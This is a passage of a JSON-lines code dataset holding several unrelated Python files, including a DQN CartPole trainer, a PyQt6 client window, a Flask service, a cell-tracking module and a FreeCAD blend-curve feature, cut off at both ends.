游戏训练的总episode数量\nnum_exploration_episodes = 100 # 探索过程所占的episode数量\nmax_len_episode = 1000000 # 每个episode的最大step\n\nbatch_size = 256\nlearning_rate = 1e-3\ngamma = 1.\n\ninitial_epsilon = 1. # 探索起始时的探索率\nfinal_epsilon = 0.01 # 探索终止时的探索率\n\npool_size = 10000 # 经验回放池大小\n\n\nclass QNetwork(tf.keras.Model):\n def __init__(self):\n super().__init__()\n self.dense1 = tf.keras.layers.Dense(units=24, activation=tf.nn.relu)\n self.dense2 = tf.keras.layers.Dense(units=24, activation=tf.nn.relu)\n self.dense3 = tf.keras.layers.Dense(units=2)\n\n def call(self, inputs):\n x = self.dense1(inputs)\n x = self.dense2(x)\n x = self.dense3(x)\n return x\n\n def predict(self, inputs):\n q_values = self(inputs)\n return tf.argmax(q_values, axis=-1)\n\n\nif __name__ == '__main__':\n env = gym.make('CartPole-v1')\n\n model = QNetwork()\n optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n replay_buffer = deque(maxlen=pool_size)\n\n epsilon = initial_epsilon\n\n for episode_id in range(num_episodes):\n state = env.reset()\n epsilon = max( # 计算当前探索率, epsilon 随着场数的增加逐渐减小\n initial_epsilon * (num_exploration_episodes - episode_id) / num_exploration_episodes,\n final_epsilon)\n\n for t in range(max_len_episode):\n env.render()\n\n # select action\n if random.random() < epsilon:\n action = env.action_space.sample()\n else:\n action = model.predict(np.expand_dims(state, axis=0)).numpy()\n action = action[0]\n\n next_state, reward, done, info = env.step(action)\n\n # 如果游戏Game Over,给予大的负奖励\n reward = -10. if done else reward\n replay_buffer.append((state, action, reward, next_state, 1 if done else 0))\n\n state = next_state\n\n if done:\n print(\"game_over, episode %d, epsilon %f, score %d\" % (episode_id, epsilon, t))\n break\n\n if len(replay_buffer) >= batch_size:\n batch_state, batch_action, batch_reward, batch_next_state, batch_done = zip(\n *random.sample(replay_buffer, batch_size))\n\n batch_state, batch_reward, batch_next_state, batch_done = \\\n [np.array(a, dtype=np.float32) for a in [batch_state, batch_reward, batch_next_state, batch_done]]\n batch_action = np.array(batch_action, dtype=np.int32)\n\n q_value = model(batch_next_state)\n\n # 游戏结束不需要结算后面的reward\n y = batch_reward + (gamma * tf.reduce_max(q_value, axis=1)) * (1 - batch_done)\n with tf.GradientTape() as tape:\n loss = tf.keras.losses.mean_squared_error(\n y_true=y,\n y_pred=tf.reduce_sum(model(batch_state) * tf.one_hot(batch_action, depth=2), axis=1)\n )\n grads = tape.gradient(loss, model.variables)\n optimizer.apply_gradients(grads_and_vars=zip(grads, model.variables))\n\n\n","repo_name":"haixiaoxuan/code-python","sub_path":"tf2.0/tf2/强化学习/01_平衡锤_dqn.py","file_name":"01_平衡锤_dqn.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31159586938","text":"from PyQt6 import QtGui\nimport requests\n\nfrom PyQt6.QtWidgets import QToolBar, QStackedWidget, QLabel\nfrom PyQt6.QtGui import QIcon, QAction, QActionGroup, QPixmap\nfrom PyQt6.QtCore import Qt, QCoreApplication\n\nfrom windows.basic_window import BasicWindow, newIcon\nfrom windows.authentication_widget import LoginWidget\nfrom windows.function_widgets import ImageDetectionWidget, VideoDetectionWidget, VideoRecognitionWidget, PornRecognitionWidget\nfrom windows.user_service import PrivacyRegisterDialog, PrivacyDetectWidget\nfrom windows.admin_service import VideoAnalysisWidget\n\n\nclass MainWindow(BasicWindow):\n def __init__(self, ip:str, port:int):\n super().__init__()\n self.url = f\"http://{ip}:{port}\"\n self.login_widget = LoginWidget(self.url)\n self.login_widget.loginSignal.connect(self.try_login)\n self.login_status = False\n\n # define basic widget object\n self.image_detection_widget = ImageDetectionWidget(self.url)\n self.video_detection_widget = VideoDetectionWidget(self.url)\n self.video_recognition_widget = VideoRecognitionWidget(self.url)\n self.porn_recognition_widget = PornRecognitionWidget(self.url)\n\n # define admin widget object\n self.video_analysis_widget = VideoAnalysisWidget(self.url)\n\n # define user widget object\n self.privacy_registration_widget = PrivacyRegisterDialog(parent=self, url=self.url)\n self.privacy_detection_widget = PrivacyDetectWidget(url=self.url)\n\n # define basic actions\n self.image_detection_act = self.action(name=\"Image\\nDetection\", icon=\"image_detection.svg\")\n self.image_detection_act.setCheckable(True)\n self.video_detection_act = self.action(name=\"Video\\nDetection\", icon=\"video_detection.svg\")\n self.video_detection_act.setCheckable(True)\n self.video_recognition_act = self.action(name=\"Video\\nRecognition\", icon=\"video_detection.svg\")\n self.video_recognition_act.setCheckable(True)\n self.porn_recognition_act = self.action(name=\"Porn\\nRecognition\", icon=\"video_detection.svg\")\n self.porn_recognition_act.setCheckable(True)\n \n # define admin actions\n self.video_analysis_act = self.action(name=\"Video\\nAnalysis\", icon=\"video_detection.svg\")\n self.video_analysis_act.setCheckable(True)\n self.video_analysis_act.setVisible(False)\n\n # define user actions\n self.privacy_registration_act = self.action(name=\"Privacy\\nRegistration\", icon=\"privacy.svg\")\n self.privacy_registration_act.triggered.connect(self.privacy_registration_widget.exec)\n self.privacy_registration_act.setDisabled(True)\n self.privacy_detection_act = self.action(name=\"Privacy\\nDetection\", icon=\"search.svg\")\n # self.privacy_detection_act.triggerd.connect()\n self.app_logout = self.action(\"Logout\", icon=\"logout.svg\", tip=\"Logout\")\n self.app_logout.triggered.connect(self.try_logout)\n self.app_logout.setDisabled(True)\n self.app_quit = self.action(\"Quit\", icon=\"quit.svg\", shortcut=\"Ctrl+q\", tip=\"Quit Application\")\n self.app_quit.triggered.connect(self.quit)\n\n # create toolbar\n self.toolbar = QToolBar(\"Tool Bar\")\n self.toolbar.setContextMenuPolicy(Qt.ContextMenuPolicy.PreventContextMenu)\n self.toolbar.setToolButtonStyle(Qt.ToolButtonStyle.ToolButtonTextUnderIcon)\n self.toolbar.addAction(self.image_detection_act)\n self.toolbar.addAction(self.video_detection_act)\n self.toolbar.addAction(self.video_recognition_act)\n self.toolbar.addAction(self.porn_recognition_act)\n self.toolbar.addAction(self.video_analysis_act) # admin function\n self.toolbar.addSeparator()\n self.toolbar.addAction(self.privacy_registration_act)\n self.toolbar.addAction(self.app_logout)\n self.toolbar.addAction(self.app_quit)\n self.addToolBar(self.toolbar)\n\n # define action group\n self.action_group = QActionGroup(self.toolbar)\n self.action_group.addAction(self.image_detection_act)\n self.action_group.addAction(self.video_detection_act)\n self.action_group.addAction(self.video_recognition_act)\n self.action_group.addAction(self.porn_recognition_act)\n self.action_group.addAction(self.video_analysis_act)\n self.action_group.setExclusive(True)\n self.action_group.triggered.connect(self.change_mode)\n self.action_group.setDisabled(True) # disable until login\n\n self.user_action_group = QActionGroup(self.toolbar)\n self.user_action_group.addAction(self.privacy_registration_act)\n self.user_action_group.addAction(self.privacy_detection_act)\n self.user_action_group.addAction(self.app_logout)\n self.user_action_group.setVisible(False)\n\n # add widgets\n self.stacked_widget = QStackedWidget(self)\n self.stacked_widget.addWidget(self.image_detection_widget)\n self.stacked_widget.addWidget(self.video_detection_widget)\n self.stacked_widget.addWidget(self.video_recognition_widget)\n self.stacked_widget.addWidget(self.porn_recognition_widget)\n self.stacked_widget.addWidget(self.video_analysis_widget)\n self.stacked_widget.addWidget(self.login_widget) # login widget is always at last order of stacked widget\n self.stacked_widget.setCurrentIndex(self.stacked_widget.count()-1) # set login widget for default\n self.basic_layout.addWidget(self.stacked_widget)\n\n def action(self, name:str, icon:str=None, shortcut:str=None, tip:str=None) -> QAction:\n if icon:\n action = QAction(newIcon(icon), name, self)\n else:\n action = QAction(name, self)\n\n action.setObjectName(name)\n\n if shortcut:\n action.setShortcut(shortcut)\n if tip:\n action.setStatusTip(tip)\n\n return action\n\n def change_mode(self, action):\n action_list = self.action_group.actions()\n checked_action = self.action_group.checkedAction()\n pre_widget = self.stacked_widget.currentWidget()\n pre_index = self.stacked_widget.currentIndex()\n post_index = action_list.index(checked_action)\n\n if pre_index != post_index:\n pre_widget.upload_widget.clear()\n self.stacked_widget.setCurrentIndex(post_index)\n self.stacked_widget.setCurrentIndex(pre_index)\n self.stacked_widget.setCurrentIndex(post_index)\n\n def try_login(self, signal):\n if signal != 'admin' and not self.login_status:\n self.login_status = True\n self.privacy_registration_widget.set_userid(signal)\n self.privacy_registration_act.setEnabled(True)\n self.app_logout.setEnabled(True)\n\n self.action_group.setEnabled(True)\n self.image_detection_act.setChecked(True)\n self.stacked_widget.setCurrentIndex(0)\n\n self.user_action_group.setVisible(True)\n\n elif signal == 'admin' and not self.login_status:\n self.login_status = True\n self.app_logout.setEnabled(True)\n\n self.action_group.setEnabled(True)\n self.video_analysis_act.setVisible(True)\n self.video_analysis_act.setChecked(True)\n self.stacked_widget.setCurrentIndex(self.stacked_widget.count()-2) # set video analysis for default\n\n def try_logout(self):\n response = requests.get(url=f\"{self.url}/logout\")\n result = response.json()['result']\n if result: # to login widget\n self.login_status = False\n pre_widget = self.stacked_widget.currentWidget()\n pre_index = self.stacked_widget.currentIndex()\n pre_widget.upload_widget.clear()\n self.action_group.checkedAction().setChecked(False)\n\n self.stacked_widget.setCurrentIndex(self.stacked_widget.count()-1)\n self.stacked_widget.setCurrentIndex(pre_index)\n self.stacked_widget.setCurrentIndex(self.stacked_widget.count()-1)\n\n self.video_analysis_act.setVisible(False)\n self.privacy_registration_act.setDisabled(True)\n self.app_logout.setDisabled(True)\n self.action_group.setDisabled(True)\n\n try:\n self.toolbar.removeAction(self.video_analysis_act)\n except:\n pass\n\n # self.removeToolBar(self.toolbar)\n # self.removeToolBar(self.admin_toolbar)\n\n def quit(self):\n if self.login_status:\n self.try_logout()\n QCoreApplication.instance().quit()\n\n def closeEvent(self, event):\n self.quit()\n super().closeEvent(event)\n\n\nif __name__ == \"__main__\":\n import sys\n from PyQt6.QtWidgets import QApplication\n app = QApplication(sys.argv)\n window = MainWindow(ip='192.168.1.230', port=18400)\n window.show()\n\n app.exec()\n\n\nr\"\"\"\nTODO\n1. 개인정보 등록과 로그아웃 하나의 action_group으로\n\"\"\"","repo_name":"HJpunch/DeepPrivacy","sub_path":"windows/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":8967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22735682528","text":"from scipy.stats import uniform\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport math\n\nfig, ax = plt.subplots(1, 1)\nintervals = [10, 100, 1000, 5000, 10000, 20000]\nseeds = [66, 67]\n\n\nzeros = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n\ndef dict_init(a):\n return dict(enumerate(a))\n\n\ndef interval(a, dic, step):\n for number in a:\n key = math.trunc((number-14666)/step)\n dic[key] += 1\n\n\ndef print_count(a, step):\n dic = dict_init(zeros)\n interval(a, dic, step)\n print(dic)\n\n\ndef generate_uniform(a, b, size, seed):\n l = []\n random.seed(seed)\n for i in range(size):\n number = random.uniform(a, b)\n l.append(number)\n return l\n\n\ndef generate_expon(number, lambd, seed):\n l = []\n random.seed(seed)\n for i in range(number):\n number = random.expovariate(lambd)\n if number > 285334:\n number = 285334\n l.append(14666 + number)\n return l\n\n\ndef generate_gamma(number, lambd, seed):\n l = []\n random.seed(seed)\n for i in range(number):\n number = random.gammavariate(3, lambd)\n if number > 285334:\n number = 285334\n l.append(14666 + number)\n return l\n\n\ndef uniform_deviation():\n for seed in seeds:\n np.random.seed(seed)\n for interval in intervals:\n e = generate_uniform(14666, 161334, interval, seed)\n print_count(e, 14666.8)\n\n r = np.asarray(e)\n plt.hist(r, bins=10)\n plt.title(\"Interval - {}. Mean: {}. Seed: {}\".format(interval, round(r.mean(), 3), seed))\n plt.show()\n print('Mean for interval {} is {}'.format(interval, r.mean()))\n print('Standard deviation for interval {} is {}'.format(interval, r.std()))\n print('Koefficient variacii for interval {} is {}\\n'.format(interval, r.std()/r.mean()))\n print(''.join(['-' for x in range(80)]))\n\n\ndef exponential_deviation():\n for seed in seeds:\n for interval in intervals:\n e = generate_expon(interval, 1/73334, seed)\n print_count(e, 28554)\n\n r = np.asarray(e)\n plt.hist(r, bins=10)\n plt.title(\"Interval - {}. Mean: {}. Seed: {}\".format(interval, r.mean(), seed))\n plt.show()\n print('Mean for interval {} is {}'.format(interval, r.mean()))\n print('Standard deviation for interval {} is {}'.format(interval, r.std()))\n print('Koefficient variacii for interval {} is {}\\n'.format(interval, r.std()/r.mean()))\n print(''.join(['-' for x in range(80)]))\n\n\ndef erlang_deviation():\n for seed in seeds:\n np.random.seed(seed)\n for interval in intervals:\n e = generate_gamma(interval, 24445, seed)\n print_count(e, 28554)\n\n e = np.asarray(e)\n plt.hist(e, bins=10)\n plt.title(\"Interval - {}. Mean: {}. Seed: {}\".format(interval, e.mean(), seed))\n plt.show()\n print('Mean for interval {} is {}'.format(interval, e.mean()))\n print('Standard deviation for interval {} is {}'.format(interval, e.std()))\n print('Koefficient variacii for interval {} is {}\\n'.format(interval, e.std()/e.mean()))\n print(''.join(['-' for x in range(80)]))\n\nerlang_deviation()\n","repo_name":"kobylyanskiy/modelling","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71080563394","text":"from eggscript_src.config import get_config\nfrom eggscript_src.expressions.expression import Expression\nfrom eggscript_src.regex import closing_curly_bracket_token, closing_parenthesis_token, opening_curly_bracket_token, semicolon_token, valid_conditional\n\nclass ConditionalExpression(Expression):\n\tdef __init__(self, tokenizer=None):\n\t\tsuper().__init__(tokenizer=tokenizer)\n\t\tself.conditional_expressions = []\n\t\tself.is_code_block = True\n\t\tself.type = \"\"\n\t\n\tdef __str__(self):\n\t\treturn f\"ConditionalExpression({self.type}, {self.conditional_expressions}, {self.expressions})\"\n\t\n\tdef __repr__(self):\n\t\treturn self.__str__()\n\n\tdef move_expressions(self):\n\t\tself.conditional_expressions = self.expressions\n\t\tself.expressions = []\n\t\n\tdef to_script(self):\n\t\tfull_output = \"\"\n\n\t\tnewline = \"\\n\"\n\t\tspace = \" \"\n\t\ttab = \"\\t\"\n\t\tif get_config(\"minify\") == True:\n\t\t\tnewline = \"\"\n\t\t\tspace = \"\"\n\t\t\ttab = \"\"\n\t\t\n\t\tif self.type != \"else\":\n\t\t\toutput = \"\"\n\t\t\tfor conditional_expression in self.conditional_expressions:\n\t\t\t\toutput = output + conditional_expression.to_script()\n\t\t\t\n\t\t\tfull_output = self.type + \"(\" + output + \")\" + space + \"{\" + newline\n\t\telse:\n\t\t\tfull_output = self.type + space + \"{\" + newline\n\t\t\n\t\toutput = \"\"\n\t\tfor expression in self.expressions:\n\t\t\toutput = output + (tab * self.get_indent_level()) + expression.to_script() + newline\n\t\t\n\t\tfull_output = full_output + output + (tab * (self.get_indent_level() - 1)) + \"}\"\n\n\t\treturn full_output\n\t\n\tdef read_expression(tokenizer, tree):\n\t\texpression = ConditionalExpression(tokenizer=tokenizer)\n\t\ttokenizer.file.give_character_back()\n\t\tif tokenizer.buffer == \"else\":\n\t\t\ttokenizer.buffer = tokenizer.buffer + \" \" + tokenizer.file.read_character() + tokenizer.file.read_character()\n\t\t\tif tokenizer.buffer != \"else if\":\n\t\t\t\ttokenizer.file.give_character_back(ignore_whitespace=True)\n\t\t\t\ttokenizer.file.give_character_back(ignore_whitespace=True)\n\n\t\t\t\ttokenizer.buffer = \"else\"\n\t\t\n\t\texpression.type = tokenizer.buffer\n\n\t\tif tokenizer.buffer != \"else\":\n\t\t\ttokenizer.file.read_character() # absorb first \"(\"\n\t\t\ttokenizer.tokenize(stop_ats=[closing_parenthesis_token], tree=expression)\n\t\t\texpression.move_expressions()\n\n\t\ttokenizer.tokenize(give_back_stop_ats=[opening_curly_bracket_token, semicolon_token], tree=expression)\n\n\t\t# figure out if this is a single line if-statement or not\n\t\tif tokenizer.file.read_character() == \"{\":\n\t\t\ttokenizer.tokenize(stop_ats=[closing_curly_bracket_token], tree=expression)\n\t\telse:\n\t\t\ttokenizer.file.give_character_back()\n\n\t\treturn expression\n\nExpression.add_keyword_regex(valid_conditional, ConditionalExpression)","repo_name":"bansheerubber/eggscript","sub_path":"eggscript_src/expressions/conditional_expression.py","file_name":"conditional_expression.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"20674144475","text":"import datapane as dp\nimport pandas as pd\n\n\nfilename = \"data/processed/merged_data_ay_2020_21.pkl\"\ndf = pd.read_pickle(filename)\n\ngender_age_breakdown = pd.crosstab(\n [df.C_Gender__c, df.C_Age__c],\n df.RT_RecordType__c,\n margins=True,\n colnames=[\"Student Type\"],\n rownames=[\"Gender\", \"Age\"],\n margins_name=\"Total\",\n)\n\nreport = dp.Report(\n dp.Page(\n title=\"FY21 EOY\",\n blocks=[\n \"### Dataset\",\n dp.Text(file=\"reports/fy21_eoy.md\").format(\n gender_age_breakdown=gender_age_breakdown\n ),\n dp.Table(gender_age_breakdown),\n ],\n ),\n)\n\nreport.upload(name=\"Test\", open=True)\n# executive_summary_pt1 = open(\"text/executive_summary_pt1.md\", \"r\").read()\n","repo_name":"College-Track/one-off","sub_path":"2022/uw_sela_fy22/reports/dp_report.py","file_name":"dp_report.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22797213588","text":"from flask import current_app, request, jsonify\n\nfrom app.models import UserModel, DescriptionModel\n\nfrom app.exc.missing_key import MissingKeyError\nfrom app.exc.required_key import RequiredKeyError\n\nfrom app.services.helper_service import verify_required_key, verify_missing_key\n\n\ndef update_description(user_id: int):\n\n required_keys = [\"experience\", \"trait\", \"paint\", \"description\", \"studio_name\"]\n\n session = current_app.db.session\n\n data = request.get_json()\n\n if verify_required_key(data, required_keys):\n raise RequiredKeyError(data, required_keys)\n\n if verify_missing_key(data, required_keys):\n raise MissingKeyError(data, required_keys)\n\n user = UserModel.query.get(user_id)\n\n if not user:\n return {\"status\": \"User NOT FOUND\"}\n\n found_description = DescriptionModel.query.get(user.description_id)\n\n for key, value in data.items():\n setattr(found_description, key, value)\n\n session.add(found_description)\n session.commit()\n\n return jsonify(found_description)\n\n\n\ndef update_description_id_in_user(user_id: int, description_id: int) -> None:\n \n session = current_app.db.session\n\n user = UserModel.query.get(user_id)\n\n if not user:\n return {\"status\": \"User NOT FOUND\"}\n\n user.description_id = description_id\n\n session.add(user)\n session.commit()\n\n\ndef update_is_artist(user_id) -> None:\n\n session = current_app.db.session\n\n user = UserModel.query.get(user_id)\n\n if user.is_artist == True:\n user.is_artist = False\n if user.is_artist == False:\n user.is_artist = True\n\n session.add(user)\n session.commit()\n\n\ndef get(user_id):\n\n user = UserModel.query.get(user_id)\n\n description = DescriptionModel.query.get(user.description_id)\n\n return jsonify(description)\n\n\ndef post(user_id):\n\n session = current_app.db.session\n\n data = request.get_json()\n\n\n description = DescriptionModel(**data)\n\n session.add(description)\n session.commit()\n\n update_description_id_in_user(user_id, description.id)\n \n return jsonify(description)\n\n\ndef delete(user_id):\n\n session = current_app.db.session\n\n user = UserModel.query.get(user_id)\n\n update_is_artist(user_id)\n\n description = DescriptionModel.query.get(user.description_id)\n\n if not description.id == user.description_id:\n return {\"error\": \"You're not allowed to delete other users descriptions\"}\n\n session.delete(description)\n session.commit()\n\n return \"\"","repo_name":"carlosbentz/seek-tattoo","sub_path":"app/services/description_service.py","file_name":"description_service.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7078109824","text":"import os\nimport pickle\n\nimport numpy as np\nfrom scipy.interpolate import interp1d\n\nfrom tracking.cell import Cell\nfrom utils.files import get_key_labels_files\n\n\nclass CellTracker:\n def __init__(self, folder_path: str, cells: list) -> None:\n self.folder_path = folder_path\n self.cells = cells\n\n def get_cell_coordinates(self, line: str) -> list:\n return list(map(float, line.split(\" \")[1:3]))\n\n def get_cell_position(self, filename: str) -> list:\n with open(self.folder_path + \"\\\\\" + filename) as f:\n return list(map(self.get_cell_coordinates, f.readlines()))\n\n def initialize_cells(self):\n initial_file = os.listdir(self.folder_path)[0]\n for index, cell_position in enumerate(\n self.get_cell_position(filename=initial_file)\n ):\n cell = Cell(number_id=index + 1)\n cell.positions[0] = cell_position\n self.cells.append(cell)\n\n def get_nearest_cell(self, coordinates: list) -> Cell:\n nearest_cell = self.cells[0]\n distance_min = nearest_cell.get_distance(coordinates=coordinates)\n\n for cell in self.cells[1:]:\n if cell.get_distance(coordinates=coordinates) < distance_min:\n nearest_cell = cell\n distance_min = cell.get_distance(coordinates=coordinates)\n\n return nearest_cell\n\n def associate_next_coords_to_cells(self, filename: str) -> dict:\n cell_coords_mapping = {}\n for coordinates in self.get_cell_position(filename=filename):\n nearest_cell = self.get_nearest_cell(coordinates=coordinates)\n\n if nearest_cell not in cell_coords_mapping.keys():\n cell_coords_mapping.update({nearest_cell: [coordinates]})\n\n else:\n cell_coords_mapping[nearest_cell].append(coordinates)\n\n return cell_coords_mapping\n\n def create_cells_if_multiple_coords(self, cell_coords_mapping: dict) -> dict:\n cells_with_multiple_coords = {\n key: value for key, value in cell_coords_mapping.items() if len(value) > 1\n }\n for cell, all_coordinates in cells_with_multiple_coords.items():\n all_diff = list(map(cell.get_distance, all_coordinates))\n selected_coords = all_coordinates[all_diff.index(min(all_diff))]\n other_coords = [\n coords for coords in all_coordinates if coords != selected_coords\n ]\n\n cell_coords_mapping.update({cell: [selected_coords]})\n for coords in other_coords:\n new_cell = Cell(number_id=len(self.cells) + 1)\n self.cells.append(new_cell)\n cell_coords_mapping.update({new_cell: [coords]})\n\n return cell_coords_mapping\n\n def set_new_positions(self, frame: int, cell_coords_mapping: dict):\n for cell in cell_coords_mapping:\n cell.positions[frame+1] = cell_coords_mapping[cell][0]\n\n def track(self):\n files = sorted(os.listdir(self.folder_path)[1:], key=get_key_labels_files)\n for frame, filename in enumerate(files):\n cell_coords_mapping = self.associate_next_coords_to_cells(filename=filename)\n cell_coords_mapping = self.create_cells_if_multiple_coords(\n cell_coords_mapping=cell_coords_mapping\n )\n self.set_new_positions(frame=frame, cell_coords_mapping=cell_coords_mapping)\n\n def interpolate_missing_coordinates(self):\n for cell in self.cells:\n positions = cell.positions\n values = [positions[i] for i in range(25) if positions[i] != [0, 0]]\n frames = [i for i in range(25) if positions[i] != [0, 0]]\n missing_frames = [i for i in range(25) if positions[i] == [0, 0]]\n\n if len(frames) > len(missing_frames):\n x_coords, y_coords = zip(*values)\n interp = interp1d(x=frames, y=x_coords, kind=\"nearest\", fill_value=\"extrapolate\")\n x_interpolated = interp(missing_frames)\n\n interp = interp1d(frames, y_coords, kind=\"nearest\", fill_value=\"extrapolate\")\n y_interpolated = interp(missing_frames)\n\n interpolated = values + list(map(list, zip(x_interpolated, y_interpolated)))\n frames = frames + missing_frames\n sorted_interpolated = [x for _, x in sorted(zip(frames, interpolated))]\n\n cell.positions = sorted_interpolated\n\n def find_zero_sublist(self, lst: list) ->list:\n all = []\n nb_zero = 0\n start = [0, 0]\n start_index = 0\n \n for index, elem in enumerate(lst):\n if (start != [0, 0]) and (elem != [0, 0]):\n if nb_zero == 0:\n start = elem\n start_index = index\n \n else:\n all.append((start_index, [start] + [[0, 0]] * nb_zero + [elem]))\n start = [0, 0]\n \n if (start == [0, 0]) and (elem != [0, 0]):\n nb_zero = 0\n start = elem\n start_index = index\n \n if (start != [0, 0]) and (elem == [0, 0]):\n nb_zero += 1\n \n return all\n\n def fill_gap_positions(self):\n for cell in self.cells:\n zero_sublist = self.find_zero_sublist(cell.positions)\n for elem in zero_sublist:\n index, lst = elem\n new_pos = np.round(np.linspace(lst[0], lst[-1], len(lst)), 6).tolist()\n for coord in new_pos:\n cell.positions[index] = coord\n index += 1\n\n def get_pickle(self):\n cells_path = {}\n for cell in self.cells:\n if [0, 0] not in cell.positions:\n cells_path.update({cell.number_id: cell.positions})\n\n with open(r'data\\track\\result.pickle', 'wb') as f:\n pickle.dump(cells_path, f)","repo_name":"MWalbecq/SpermAnalysis","sub_path":"src/tracking/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29011942114","text":"'''\ntry:\n output = 10/0\n num=int(input(\"Enter a number\"))\n\nexcept:\n print (\"invalid input\")\n '''\ntry:\n output = 10/0\n num=int(input(\"Enter a number\"))\n\nexcept ZeroDivisionError as err:\n print (err)\n\nexcept ValueError as err1:\n print (err1)\n\nprint (\"cross check if other statements print or not\")\n","repo_name":"soniaM7/Python_basics","sub_path":"com/automation/try_catch.py","file_name":"try_catch.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19928533098","text":"# -*- coding: utf-8 -*-\n\n__title__ = \"Blend curve\"\n__author__ = \"Christophe Grellier (Chris_G)\"\n__license__ = \"LGPL 2.1\"\n__doc__ = \"Blend curve between two edges. Double-clic object to enable/disable freehand mouse editing.\"\n\nimport os\nimport FreeCAD\nimport FreeCADGui\nimport Part\nfrom freecad.Curves import _utils\nfrom freecad.Curves import ICONPATH\n\nfrom pivy import coin\n# from freecad.Curves import nurbs_tools\nfrom freecad.Curves import blend_curve\nfrom freecad.Curves import CoinNodes\nfrom freecad.Curves import graphics\nfrom freecad.Curves import manipulators\n\nTOOL_ICON = os.path.join(ICONPATH, 'blend1.svg')\n# debug = _utils.debug\ndebug = _utils.doNothing\n\nif not blend_curve.CAN_MINIMIZE:\n __doc__ += \"\\nInstall 'scipy' python package for AutoScale feature\"\n\n\nclass BlendCurveFP:\n def __init__(self, obj, edges):\n debug(\"BlendCurve class Init\")\n obj.addProperty(\"App::PropertyLinkSub\", \"Edge1\", \"Edge1\", \"Edge 1\").Edge1 = edges[0]\n obj.addProperty(\"App::PropertyLinkSub\", \"Edge2\", \"Edge2\", \"Edge 2\").Edge2 = edges[1]\n # obj.addProperty(\"App::PropertyInteger\", \"DegreeMax\", \"BlendCurve\", \"Max degree of the Blend curve\").DegreeMax = 9\n obj.addProperty(\"App::PropertyDistance\", \"Parameter1\", \"Edge1\", \"Location on first edge\")\n obj.addProperty(\"App::PropertyBool\", \"Reverse1\", \"Edge1\", \"Reverse Edge\").Reverse1 = False\n obj.addProperty(\"App::PropertyFloatConstraint\", \"Scale1\", \"Edge1\", \"Scale of blend curve\")\n obj.addProperty(\"App::PropertyEnumeration\", \"Continuity1\", \"Edge1\", \"Continuity\").Continuity1 = [\"C0\", \"G1\", \"G2\", \"G3\", \"G4\"]\n obj.addProperty(\"App::PropertyDistance\", \"Parameter2\", \"Edge2\", \"Location on second edge\")\n obj.addProperty(\"App::PropertyBool\", \"Reverse2\", \"Edge2\", \"Reverse Edge\").Reverse2 = False\n obj.addProperty(\"App::PropertyFloatConstraint\", \"Scale2\", \"Edge2\", \"Scale of blend curve\")\n obj.addProperty(\"App::PropertyEnumeration\", \"Continuity2\", \"Edge2\", \"Continuity\").Continuity2 = [\"C0\", \"G1\", \"G2\", \"G3\", \"G4\"]\n obj.addProperty(\"App::PropertyVectorList\", \"CurvePts\", \"BlendCurve\", \"Poles of the Bezier curve\")\n obj.addProperty(\"App::PropertyEnumeration\", \"Output\", \"BlendCurve\", \"Output type\").Output = [\"Wire\", \"Joined\", \"Single\"]\n obj.addProperty(\"App::PropertyBool\", \"AutoScale\", \"BlendCurve\", \"Compute scales to get minimal curvature along curve\").AutoScale = False\n obj.Scale1 = (1., -5.0, 5.0, 0.05)\n obj.Scale2 = (1., -5.0, 5.0, 0.05)\n obj.setEditorMode(\"CurvePts\", 2)\n obj.Proxy = self\n\n def check_minimize(self, fp):\n if blend_curve.CAN_MINIMIZE:\n fp.setEditorMode(\"AutoScale\", 0)\n else:\n FreeCAD.Console.PrintWarning(\"BlendCurve: Install 'scipy' python package for AutoScale feature\\n\")\n fp.setEditorMode(\"AutoScale\", 2)\n\n def getShape(self, fp, prop):\n sub = None\n if hasattr(fp, prop) and fp.getPropertyByName(prop):\n obj, senl = fp.getPropertyByName(prop)\n for sen in senl:\n if (\"Edge\" in sen) or (\"Line\" in sen):\n sh = obj.Shape.copy()\n sh.Placement = obj.getGlobalPlacement()\n sub = sh.getElement(sen)\n break\n return sub\n\n def migrate(self, fp):\n if hasattr(fp, \"DegreeMax\"):\n fp.removeProperty(\"DegreeMax\")\n if not hasattr(fp, \"AutoScale\"):\n fp.addProperty(\"App::PropertyBool\", \"AutoScale\", \"BlendCurve\",\n \"Compute scales to get minimal curvature along curve\").AutoScale = False\n if not hasattr(fp, \"Reverse1\"):\n fp.addProperty(\"App::PropertyBool\", \"Reverse1\", \"Edge1\", \"Reverse Edge\").Reverse1 = False\n if not hasattr(fp, \"Reverse2\"):\n fp.addProperty(\"App::PropertyBool\", \"Reverse2\", \"Edge2\", \"Reverse Edge\").Reverse2 = False\n if fp.getTypeIdOfProperty(\"Parameter1\") == \"App::PropertyFloatConstraint\":\n e1 = self.getShape(fp, \"Edge1\")\n val = fp.Parameter1 * e1.Length\n fp.removeProperty(\"Parameter1\")\n fp.addProperty(\"App::PropertyDistance\", \"Parameter1\", \"Edge1\", \"Location on first edge\")\n fp.Parameter1 = val\n if fp.getTypeIdOfProperty(\"Parameter2\") == \"App::PropertyFloatConstraint\":\n e2 = self.getShape(fp, \"Edge2\")\n val = fp.Parameter2 * e2.Length\n fp.removeProperty(\"Parameter2\")\n fp.addProperty(\"App::PropertyDistance\", \"Parameter2\", \"Edge1\", 